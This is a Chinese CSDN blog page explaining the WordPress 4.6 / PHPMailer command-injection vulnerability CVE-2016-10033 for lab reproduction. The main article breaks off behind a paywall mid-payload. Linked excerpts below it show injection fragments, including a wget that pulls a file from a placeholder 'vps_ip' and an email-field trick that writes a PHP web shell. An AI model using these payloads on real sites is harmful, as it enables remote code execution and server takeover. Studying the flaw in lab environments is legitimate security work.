WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)

最新推荐文章于 2024-05-23 09:52:21 发布
最新推荐文章于 2024-05-23 09:52:21 发布
阅读量4.7k 收藏 9
点赞数 3
分类专栏: CVE 文章标签: WordPress 命令执行漏洞 CVE 渗透测试 PHPMailer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/86776080
版权

WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)

漏洞概述:

  • 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。

漏洞版本:

  • WordPress <= 4.6.0
  • PHPMailer < 5.2.18

漏洞原理:

  • 主要是phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。

漏洞搭建:

漏洞复现:

  • 首先进行payload构造:
aa(any -froot@localhost -be ${run{/bin/touch /
最低0.47元/天 解锁文章
SoulCat.
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 599
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
Web安全 -- CVE-2016-10033漏洞
redBu1l的博客
12-10 4001
引言CVE-2016-10033漏洞背景独立研究人员Dawid Golunski发现该漏洞—远程攻击者利用该漏洞,可实现远程任意代码在web服务器上执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反悔表单、注册表单中 ,邮件密码重置表单等使用发送的组建时利用此漏洞漏洞影响的版本PHPMailer < 5.2.18环境搭建模拟如图网络环境web服务器配置web服务器的系统为cent
探索PHPMailer的安全边界:CVE-2016-10033漏洞的重现与利用
最新发布
gitblog_00057的博客
05-23 285
探索PHPMailer的安全边界:CVE-2016-10033漏洞的重现与利用 项目地址:https://gitcode.com/opsxcq/exploit-CVE-2016-10033 在广阔的Web开发世界中,PHPMailer是一个被广泛使用的邮件传输类库,据估计全球有超过900万的开发者在他们的项目中依赖它。然而,如同任何复杂的软件一样,PHPMailer也曾遭遇安全挑战。本文将带你深入...
[Vulfocus解题系列] WordPress远程命令执行CVE-2016-10033
00勇士王子的博客
07-07 2272
漏洞介绍 名称: wordpress 远程代码执行CVE-2016-10033) 描述: WordPressWordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。 影响版本 WordPr
Wordpress 4.6 任意命令执行漏洞
锋刃科技的博客
06-12 4829
1、简介 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建 我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke
【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞CVE-2016-10033
weixin_42884199的博客
12-06 376
一、启动靶机 docker-compose build docker-compose up -d 访问URL进行install: http://192.168.150.146:8080 二、生成payload 前提:命令中 空格 用 ${substr{10}{1}{$tod_log}}代替 / 用 ${substr{0}{1}{$spool_directory}}代替 命令: /usr/bin/wget --output-document /tmp/rce vps_ip/a.txt payload:
WordPress Exploit-4-6 RCE CVE-2016-10033
公众号shadow sock7
05-07 1039
原文: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html绕过过滤器To exploit the PHPMailer’s mail() injection vulnerability, an attacker would have to be able to append param
exploit-CVE-2016-10033PHPMailer <5.2.18远程执行代码漏洞和易受攻击的容器
02-01
脆弱的环境要为您的测试设置易受攻击的环境,您将需要安装 ,只需运行以下命令: docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033它将在8080端口上的主机上生成易受攻击的Web应用程序利用要利用此目标,...
PHPMailer-master
07-01
接着运行`composer install`命令,这将自动下载并安装PHPMailer及其依赖。然后,你可以通过以下代码示例来学习如何使用PHPMailer发送邮件: ```php <?php require 'vendor/autoload.php'; use ...
PHPMailer-5.2.8.zip
05-14
这个压缩包文件“PHPMailer-5.2.8.zip”包含了完整的源代码和其他相关文件,确保了用户可以获得一个完整的开发环境。 1. **PHPMailer介绍**: PHPMailer 是一个基于PHP的邮件发送库,支持多种邮件协议,包括SMTP...
wp-phpmailer:提供一种干净简单的方法来配置WordPress捆绑PHPMailer库,使您可以快速开始通过您选择的本地或基于云的服务发送邮件
02-06
WP PHPMailer 提供了一种干净简单的方法来配置,使您可以快速开始通过您选择的本地或基于云的服务发送邮件。 目标 尽管WordPress捆绑, 使您可以通过所选的本地或基于云的服务发送邮件,但是不同的基于云的服务...
PHPMailer-master邮件类.zip
07-11
require './PHPMailer-master/PHPMailerAutoload.php'; $mail = new PHPMailer; //$mail->SMTPDebug = 3; // 关闭SMTP调试功能 1 = error // Enable verbose debug output $mail->isSMTP(); //...
php mailer cve利用,CVE-2016-10033PHPMailer漏洞利用
weixin_29421409的博客
03-28 365
原标题:CVE-2016-10033PHPMailer漏洞利用Pr0.s说:MalwareBenchmark的“鬼”博士第一次出手写文章,尽管思维有点儿 跳跃, 但懂行的人会知道价值~!(*^__^*) 嘻嘻……PoC链接:漏洞成因分析: 上图是PHPMailer发送邮件时,关键函数的调用关系。mailSend方法中,Sender变换之后,得到$params,最终作为第五个参数传递给mailP...
wordpress 发邮件 php,使用WordPressPHPMailer发送Email | 学步园
weixin_28771365的博客
03-10 729
PHP内置的mail函数的用法是极其恐怖的,至少我在看了mail函数的说明后就再也提不起兴趣来了。不仅如此,对于使用远程的SMTP服务器的 用户来说,mail函数根本就不起作用。而现在的大多数SMTP服务器都需要用户名验证,PHP本身是不支持验证的,要实现这一点,必须去读SMTP协 议,然后自己现实一个邮件发送程序……太恐怖了。WordPress是目前世界上最流行的Blog程序,本身的架构非常好。...
php mailer cve利用,PHPMailer曝远程代码执行高危漏洞CVE-2016-10033)含PoC
weixin_32364135的博客
03-28 206
这次曝出远程代码执行漏洞的是堪称全球最流行邮件发送类的PHPMailer,据说其全球范围内的用户量大约有900万——每天还在持续增多。GitHub上面形容PHPMailer“可能是全球PHP发送邮件最流行的代码。亦被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等”。所以这个漏洞影响范围还是比较广的,漏洞级别也为Critical最高级。漏洞编码CVE-2016-...
PHPMailer远程命令执行漏洞复现
thelostworld
12-31 1677
PHPMailer远程命令执行漏洞复现 一、漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 二、影响版本: PHPMailer<5.2.18 三、漏洞复现 Docker环境: dockerrun --r..
php mailer cve利用,PHPMailer远程任意代码执行漏洞CVE-2016-10033 900万用户受影响 站长们要小心了...
weixin_36414864的博客
03-28 263
PHPMailer出现漏洞CVE-2016-10033,全球900万用户容易遭受远程攻击。官方目前已经发布新版本,请用户尽快升级。PHPMailer5.2.18 之前所有版本都受到影响。CVE官方对于该漏洞的描述还处于保留状态。PHP Mailer是什么PHPMailer,用于发送电子邮件的最受欢迎的开源PHP库之一,也是PHPMailer是一个用于发送电子邮件的PHP函数包。据估计,世界各...
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 455
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
CVE-2016-10033
08-30
CVE-2016-10033PHPMailer中存在的高危漏洞。这个漏洞是由于class.phpmailer.php文件没有正确处理用户的请求导致的。攻击者只需要巧妙地构造出一个恶意邮箱地址,就可以写入任意文件,从而造成远程命令执行的危害。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值